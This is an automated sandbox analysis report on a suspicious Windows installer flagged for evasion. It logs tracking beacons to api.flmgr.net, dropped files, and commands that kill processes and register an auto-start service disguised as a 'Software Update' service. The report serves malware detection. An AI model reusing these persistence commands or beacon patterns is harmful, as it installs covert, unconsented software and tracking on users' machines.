Source: global trafficHTTP traffic detected: GET /log/client/run?User=e3c4aca4bf472f3bc70d155d55d5bb2f&InstallDate=2023-08-04&ChannelCode=2&Ver=1.0.7.17&StartMode=0&OsVer=10.0&Action=runkit&step=1&Intact=1&Miss=&RunMode=0&UserEv=0&Sdsoft=0 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; )Host: api.flmgr.net
Source: global trafficHTTP traffic detected: GET /log/client/run?User=e3c4aca4bf472f3bc70d155d55d5bb2f&InstallDate=2023-08-04&ChannelCode=2&Ver=1.0.7.17&StartMode=0&OsVer=10.0&Action=runkit&step=1&Intact=1&Miss=&RunMode=0&UserEv=0&Sdsoft=0 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; )Host: api.flmgr.net
Source: global trafficHTTP traffic detected: GET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=2004&r=0&d=3112701&tag=kittip HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.360.cn
Source: global trafficHTTP traffic detected: GET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=0&r=0&d=3112701&tag=kittip HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.360.cn
Source: global trafficHTTP traffic detected: GET /log/client/run?User=e3c4aca4bf472f3bc70d155d55d5bb2f&Ver=1.0.7.17&ChannelCode=2&Action=pc_server&InstallDate=2023-08-04 HTTP/1.1Host: api.flmgr.netAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Source: global trafficHTTP traffic detected: GET /log/client/run?User=e3c4aca4bf472f3bc70d155d55d5bb2f&Ver=1.0.7.17&ChannelCode=2&Action=pc_server&InstallDate=2023-08-04 HTTP/1.1Host: api.flmgr.netAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Source: global trafficHTTP traffic detected: GET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=201&r=0&d=3112701&tag=kittip HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.360.cn
Source: global trafficHTTP traffic detected: GET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=218&r=0&d=3112701&tag=kittip HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.360.cn
Source: global trafficHTTP traffic detected: GET /wsin/think?ipartner=3112701&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&mid=b8a4400180ee20f44982cb4d73d6fcd7&rand=129489&timestamp=1691200180&ver=3.0.0.2253&sign=674ed7833112441346026e4e45978c4c HTTP/1.1Host: inf.safe.360.cnAccept: */*Pragma: no-cacheCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /wsin/think?ipartner=3112701&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&mid=b8a4400180ee20f44982cb4d73d6fcd7&rand=129489&timestamp=1691200180&ver=3.0.0.2253&sign=674ed7833112441346026e4e45978c4c HTTP/1.1Host: inf.safe.360.cnAccept: */*Pragma: no-cacheCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=391&r=0&d=3112701&tag=kittip HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.360.cn
Source: global trafficHTTP traffic detected: GET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=324&r=0&d=3112701&tag=kittip HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.360.cn
Source: global trafficHTTP traffic detected: GET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=325&r=0&d=3112701&tag=kittip HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.360.cn
Source: global trafficHTTP traffic detected: GET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=303&r=0&d=3112701&tag=kittip HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.360.cn
Source: global trafficHTTP traffic detected: GET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002264&s=2004&r=0&d=3112701&tag=kittip HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.360.cn
Source: global trafficHTTP traffic detected: GET /hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002264&s=2004&r=0&d=3112701&tag=kittip HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.360.cn
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTP traffic detected: POST /v1/client/configs HTTP/1.1Connection: Keep-AliveProxy-Connection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/plain, application/xhtml+xmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36Content-Length: 216Host: api.flmgr.net
Source: unknownHTTPS traffic detected: 113.142.34.181:443 -> 192.168.2.3:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.192.108.19:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: _____NCM______2_10042231.exe, 00000000.00000002.731916508.00000000019EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeCode function: 0_3_100015800_3_10001580
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeCode function: 0_3_10001DD00_3_10001DD0
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeCode function: 0_3_10011C880_3_10011C88
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeCode function: 0_3_1000CB300_3_1000CB30
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeCode function: 0_3_10001B600_3_10001B60
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeCode function: 0_3_1000CFDE0_3_1000CFDE
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeCode function: 0_3_10006FE00_3_10006FE0
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_0016E9A023_2_0016E9A0
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_0017EB6023_2_0017EB60
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_0016CB9023_2_0016CB90
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_00171B8823_2_00171B88
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_00173BD023_2_00173BD0
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_0017141023_2_00171410
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_0016E44023_2_0016E440
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_0018847023_2_00188470
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_0017E4B523_2_0017E4B5
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_001745A023_2_001745A0
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_0017F67023_2_0017F670
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_001727D023_2_001727D0
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_0018003023_2_00180030
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_0016187023_2_00161870
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_001620C023_2_001620C0
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_00161A0023_2_00161A00
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_0016AA2023_2_0016AA20
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_0018C27023_2_0018C270
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_00163A6023_2_00163A60
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_0018BB7023_2_0018BB70
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_00161BD023_2_00161BD0
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_0016147023_2_00161470
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_0018B63023_2_0018B630
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_0016F68023_2_0016F680
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_00188ED023_2_00188ED0
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_001706C023_2_001706C0
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_0016171023_2_00161710
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeSection loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeSection loaded: devrtl.dll
Source: _____NCM______2_10042231.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: FLExt.exe.0.drStatic PE information: Resource name: ZIPRES type: Zip archive data, at least v2.0 to extract, compression method=store
Source: FLMgrTray.exe.0.drStatic PE information: Resource name: ZIPRES type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: FLMgrUpdate.exe.0.drStatic PE information: Resource name: ZIPRES type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: leave.exe.0.drStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: leave.exe.0.drStatic PE information: Resource name: ZIPRES type: Zip archive data, at least v2.0 to extract, compression method=store
Source: winLead.exe.0.drStatic PE information: Resource name: ZIP type: Zip archive data, at least v1.0 to extract, compression method=store
Source: winManager.exe.0.drStatic PE information: Resource name: ZIPRES type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: KitTip.dll.23.drStatic PE information: Resource name: BIN type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: KitTip.dll.23.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: KitTip.dll0.23.drStatic PE information: Resource name: BIN type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: KitTip.dll0.23.drStatic PE information: Resource name: RT_RCDATA type: COM executable for DOS
Source: KitTip.dll0.23.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: InternetKitTip.dll.23.drStatic PE information: Resource name: BIN type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: InternetKitTip.dll.23.drStatic PE information: Resource name: RT_RCDATA type: COM executable for DOS
Source: InternetKitTip.dll.23.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: api-ms-win-core-interlocked-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-fibers-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: soui-sys-resource.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: API-MS-Win-core-xstate-l2-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
Source: _____NCM______2_10042231.exe, 00000000.00000003.618923470.0000000010ACF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenode.dllF vs _____NCM______2_10042231.exe
Source: _____NCM______2_10042231.exe, 00000000.00000003.618841166.000000000F530000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamezlib1.dll* vs _____NCM______2_10042231.exe
Source: _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamezlib1.dll* vs _____NCM______2_10042231.exe
Source: _____NCM______2_10042231.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ??????.lnk.0.drLNK file: ..\AppData\Local\winManager\winManager.exe
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManagerJump to behavior
Source: classification engineClassification label: mal42.evad.winEXE@33/86@25/12
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_0016BFB7 _time64,_time64,?SetInstance@CPaintManagerUI@DuiLib@@SAXPAUHINSTANCE__@@@Z,?GetResourceDll@CPaintManagerUI@DuiLib@@SAPAUHINSTANCE__@@XZ,?GetResourceDll@CPaintManagerUI@DuiLib@@SAPAUHINSTANCE__@@XZ,FindResourceW,?GetResourceDll@CPaintManagerUI@DuiLib@@SAPAUHINSTANCE__@@XZ,LoadResource,?GetResourceDll@CPaintManagerUI@DuiLib@@SAPAUHINSTANCE__@@XZ,SizeofResource,LockResource,?SetResourceZip@CPaintManagerUI@DuiLib@@SAXPAXIPB_W@Z,?Create@CWindowWnd@DuiLib@@QAEPAUHWND__@@PAU3@PB_WKKHHHHPAUHMENU__@@@Z,?ShowModal@CWindowWnd@DuiLib@@QAEIXZ,_time64,_invalid_parameter_noinfo_noreturn,Sleep,Sleep,23_2_0016BFB7
Source: _____NCM______2_10042231.exeReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\_____NCM______2_10042231.exe C:\Users\user\Desktop\_____NCM______2_10042231.exe
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop SoftUpdateSrv
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Windows\SysWOW64\sc.exe sc delete SoftUpdateSrv
Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im winManager.exe
Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im FLMgrUpdate.exe
Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im FLMgrTray.exe
Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\explorer.exe" /select,"C:\Users\user\Desktop\wyyyyncmwjzh.rar
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Windows\SysWOW64\sc.exe sc CREATE SoftUpdateSrv type= own start= auto DisplayName= "Software Update Event Notification Service" binPath= "C:\Users\user\AppData\Local\winManager\FLServer.exe"
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Windows\SysWOW64\sc.exe sc description SoftUpdateSrv "???????????"
Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Users\user\AppData\Local\winManager\FLMgrTray.exe C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start SoftUpdateSrv
Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Local\winManager\FLServer.exe C:\Users\user\AppData\Local\winManager\FLServer.exe
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeProcess created: C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop SoftUpdateSrvJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Windows\SysWOW64\sc.exe sc delete SoftUpdateSrvJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im winManager.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im FLMgrUpdate.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im FLMgrTray.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\explorer.exe" /select,"C:\Users\user\Desktop\wyyyyncmwjzh.rarJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Windows\SysWOW64\sc.exe sc CREATE SoftUpdateSrv type= own start= auto DisplayName= "Software Update Event Notification Service" binPath= "C:\Users\user\AppData\Local\winManager\FLServer.exe"Jump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Windows\SysWOW64\sc.exe sc description SoftUpdateSrv "???????????"Jump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Users\user\AppData\Local\winManager\FLMgrTray.exe C:\Users\user\AppData\Local\winManager\FLMgrTray.exe Jump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start SoftUpdateSrvJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeProcess created: C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4657278A-411B-11d2-839A-00C04FD918D0}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;winManager.exe&quot;)
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;FLMgrUpdate.exe&quot;)
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;FLMgrTray.exe&quot;)
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\Temp\nk4LcUSPQNm6E5SRJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6636:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6036:120:WilError_01
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeMutant created: \Sessions\1\BaseNamedObjects\WindowsPcManager______NCM______2_10042231.exe
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5056:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6668:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5368:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4832:120:WilError_01
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeMutant created: \Sessions\1\BaseNamedObjects\FLMgrTray.exe
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeMutant created: \Sessions\1\BaseNamedObjects\1830B7BD-F7A3-4c4d-989B-C004DE465EDE 5852
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeMutant created: \Sessions\1\BaseNamedObjects\{3E86EFF3-B841-4466-B791-89F1F0DA3E95}
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5380:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_01
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeFile written: C:\Users\user\AppData\Local\Temp\KitTipConf.ini
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Windows\SysWOW64\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
